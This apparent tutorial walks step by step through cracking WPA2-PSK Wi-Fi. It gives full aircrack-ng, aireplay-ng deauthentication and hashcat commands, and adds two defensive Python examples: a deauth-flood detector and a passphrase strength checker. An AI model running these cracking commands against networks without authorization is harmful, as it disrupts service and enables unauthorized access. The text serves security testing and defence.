WPA2 PSK (Pre-Shared Key) cracking follows a systematic 6-step process:
- Place - Put wireless card into monitor mode
- Discover - Discover information about the network (Channel, BSSID)
- Select - Select network and capture data
- Perform - Perform deauth attack
- Capture - Capture WPA handshake
- Attempt - Attempt to crack the handshake
First, identify your wireless interface and put it into monitor mode:
# Check wireless interfaces
iwconfig
# Kill processes that might interfere
sudo airmon-ng check kill
# Put interface into monitor mode
sudo airmon-ng start wlan0
# Verify monitor mode is active
iwconfig
Your interface should now show as wlan0mon or similar.
Use airodump-ng to discover networks and gather information:
# Scan for networks
sudo airodump-ng wlan0mon
Look for:
- BSSID (MAC address of the access point)
- Channel number
- ESSID (network name)
- Encryption type (WPA2)
- Connected clients (stations)
Focus on a specific network and start capturing:
# Capture specific network
sudo airodump-ng -c [CHANNEL] --bssid [BSSID] -w capture wlan0mon
Example:
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
This will:
- Monitor channel 6
- Focus on the specific BSSID
- Save capture to files starting with "capture"
In a new terminal, perform a deauthentication attack to force clients to reconnect:
# Deauth all clients from the AP
sudo aireplay-ng -0 10 -a [BSSID] wlan0mon
# Deauth specific client
sudo aireplay-ng -0 10 -a [BSSID] -c [CLIENT_MAC] wlan0mon
Example:
# Deauth all clients
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Deauth specific client
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
Parameters:
-0 = Deauthentication attack
10 = Number of deauth packets to send
-a = Access Point BSSID
-c = Client MAC address (optional)
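Seen from the network owner's side, the deauthentication step above is exactly what a wireless IDS rule looks for: a burst of deauthentication or disassociation frames from a single source address, typically spoofed as the access point itself. The following Python script is an added example, not part of the original page or of the aircrack-ng suite. It runs a sliding-window rule over a constructed, tshark-like frame log; the log format, the 2-second window and the threshold of 8 frames are assumptions chosen for the demonstration.

```python
"""Sliding-window detector for 802.11 deauthentication floods (added example).

Input is a constructed text export with one frame per line:
    <epoch seconds> <source MAC> <destination MAC> <frame subtype hex> [reason=N]
Management frame subtype 0x0c is Deauthentication, 0x0a is Disassociation.
A source that emits more than THRESHOLD such frames inside WINDOW_SECONDS is
reported once, which is the shape of a basic wireless IDS rule.
"""
from collections import defaultdict, deque

DEAUTH, DISASSOC = 0x0C, 0x0A
WINDOW_SECONDS = 2.0   # assumed window length
THRESHOLD = 8          # assumed: more than 8 deauth/disassoc frames per window is a flood

# Constructed sample log. The addresses are the page's example AP and client.
AP = "aa:bb:cc:dd:ee:ff"
CLIENT = "11:22:33:44:55:66"
SAMPLE_FRAMES = [
    f"1700000000.000 {AP} ff:ff:ff:ff:ff:ff 0x08",        # beacon: ignored
    f"1700000000.050 {CLIENT} {AP} 0x0c reason=3",        # one legitimate deauth (client leaving)
    f"1700000000.900 {AP} ff:ff:ff:ff:ff:ff 0x08",        # beacon: ignored
] + [
    # ten broadcast deauths within one second, source spoofed as the AP
    f"{1700000001 + i * 0.1:.3f} {AP} ff:ff:ff:ff:ff:ff 0x0c reason=7"
    for i in range(10)
] + [
    f"1700000002.500 {AP} ff:ff:ff:ff:ff:ff 0x08",        # beacon: ignored
]


def parse_line(line):
    """Parse one log line into a dict, or return None for malformed lines."""
    parts = line.split()
    if len(parts) < 4:
        return None
    ts, src, dst, subtype = parts[:4]
    try:
        return {"ts": float(ts), "src": src.lower(), "dst": dst.lower(),
                "subtype": int(subtype, 16)}
    except ValueError:
        return None


def detect_deauth_flood(lines, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return a list of (source MAC, timestamp of first alert, frames in window).

    Each source address keeps a deque of timestamps of its deauth/disassoc
    frames; timestamps older than `window` are dropped as new frames arrive.
    """
    windows = defaultdict(deque)
    alerts = {}
    for line in lines:
        frame = parse_line(line)
        if frame is None or frame["subtype"] not in (DEAUTH, DISASSOC):
            continue
        q = windows[frame["src"]]
        q.append(frame["ts"])
        while q and frame["ts"] - q[0] > window:
            q.popleft()
        if len(q) > threshold and frame["src"] not in alerts:
            alerts[frame["src"]] = (frame["ts"], len(q))
    return [(src, ts, count) for src, (ts, count) in alerts.items()]


if __name__ == "__main__":
    for src, ts, count in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"ALERT deauth flood: source={src} first_seen={ts:.3f} frames_in_window={count}")
```

Note the practical caveat the sample illustrates: because the flood is spoofed with the access point's own address, the alert names the legitimate BSSID. A real deployment correlates this with whether the AP itself logged those disassociations, and with Protected Management Frames (802.11w), which makes forged deauthentication frames verifiable and is the standard mitigation for this step.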
Monitor the airodump-ng output for the handshake capture:
WPA handshake: AA:BB:CC:DD:EE:FF
When you see this message, the handshake has been captured successfully.
Use aircrack-ng or hashcat to crack the captured handshake:
# Crack with wordlist
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Crack specific network
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b [BSSID] capture-01.cap
# Convert .cap to .hccapx format
cap2hccapx capture-01.cap capture.hccapx
# Crack with hashcat (mode 2500 for WPA/WPA2)
hashcat -m 2500 capture.hccapx /usr/share/wordlists/rockyou.txt
# For newer hashcat versions (mode 22000)
hcxpcapngtool -o capture.22000 capture-01.cap
hashcat -m 22000 capture.22000 /usr/share/wordlists/rockyou.txt
Requirements:
- Wireless adapter capable of monitor mode and packet injection
- Target network must have connected clients
- Legal authorization to test the network
Tips:
- Patience: Wait for natural client connections if deauth doesn't work
- Multiple attempts: Try different deauth techniques
- Good wordlists: Use comprehensive wordlists like rockyou.txt
- Hardware: Use a good wireless adapter (e.g., Alfa AWUS036ACS)
Troubleshooting:
- No handshake captured: Try different deauth methods or wait longer
- Weak signal: Get closer to the target network
- No clients: Some networks may not have active clients
Automated WPA2 cracking tool:
sudo wifite --wpa --dict /usr/share/wordlists/rockyou.txt
Another automated approach:
sudo besside-ng -c [CHANNEL] -b [BSSID] wlan0mon
Key points:
- WPA2 PSK cracking requires capturing the 4-way handshake
- Deauth attacks force clients to reconnect and expose the handshake
- Success depends on password strength and wordlist quality
- Always ensure you have proper authorization before testing
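The cracking step and the key point about password strength both come down to one fact: the handshake lets an attacker test guesses offline, and each guess costs one PBKDF2 derivation of the PMK from the passphrase and the SSID. The Python below is an added example, not code from the original page or from aircrack-ng or hashcat. It implements the standard 802.11i PMK derivation that every access point and client already performs (checked against the IEEE 802.11i Annex H test vector), and a passphrase review helper that flags the kinds of passphrases the wordlist step above recovers cheaply. The small wordlist, the 16-character and 60-bit policy thresholds, and the mangling rule are assumptions made for the example.

```python
"""WPA2-PSK passphrase review helper (added example, not from the original page).

derive_pmk()      : the 802.11i derivation the AP and supplicant perform,
                    PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt, 256-bit output.
                    Every wordlist guess costs exactly this much work, and a
                    table precomputed for one SSID is useless for another.
check_passphrase(): rejects passphrases a wordlist attack recovers cheaply:
                    too short, verbatim in a wordlist, or a wordlist word with
                    digits/symbols appended; also reports low estimated entropy.
"""
import hashlib
import math
import string

# Constructed stand-in for rockyou.txt; a real review would load the full list.
CONSTRUCTED_WORDLIST = {"password", "letmein", "sunshine", "iloveyou", "qwerty123"}

MIN_RECOMMENDED_LENGTH = 16   # assumed policy value
MIN_ENTROPY_BITS = 60         # assumed policy value


def derive_pmk(passphrase: str, ssid: str) -> str:
    """Return the 32-byte Pairwise Master Key as hex, as defined in IEEE 802.11i."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2-PSK passphrases are 8 to 63 ASCII characters")
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                              ssid.encode("utf-8"), 4096, 32)
    return pmk.hex()


def estimate_entropy_bits(passphrase: str) -> float:
    """Rough upper bound: length times log2 of the character pool actually used."""
    pool = 0
    if any(c.islower() for c in passphrase):
        pool += 26
    if any(c.isupper() for c in passphrase):
        pool += 26
    if any(c.isdigit() for c in passphrase):
        pool += 10
    if any(c in string.punctuation or c == " " for c in passphrase):
        pool += 33
    return len(passphrase) * math.log2(pool) if pool else 0.0


def check_passphrase(passphrase: str, wordlist=CONSTRUCTED_WORDLIST) -> list:
    """Return a list of findings; an empty list means the passphrase passed."""
    findings = []
    if len(passphrase) < 8:
        findings.append("shorter than the WPA2 minimum of 8 characters")
    elif len(passphrase) < MIN_RECOMMENDED_LENGTH:
        findings.append(f"under {MIN_RECOMMENDED_LENGTH} characters; prefer a long random passphrase")
    lowered = passphrase.lower()
    # Simple mangling rule: strip trailing digits/symbols, which cracking rules
    # reverse with a handful of candidates per word.
    base = lowered.rstrip(string.digits + string.punctuation)
    if lowered in wordlist:
        findings.append("present verbatim in the wordlist")
    elif base in wordlist:
        findings.append("a wordlist word with trailing digits/symbols appended")
    if estimate_entropy_bits(passphrase) < MIN_ENTROPY_BITS:
        findings.append(f"estimated entropy below {MIN_ENTROPY_BITS} bits")
    return findings


if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE".
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE"))
    for candidate in ("Sunshine2024!", "correct horse battery staple 7"):
        result = check_passphrase(candidate)
        print(repr(candidate), "->", result or "OK")
```

The derivation makes the SSID's role visible: it is the salt, so a unique SSID defeats precomputed tables, while a default SSID such as a vendor name does not. It also shows why the advice in the key points is about passphrase strength rather than about the handshake itself: a long random passphrase is outside any wordlist, and the 4096-round derivation keeps the guess rate bounded.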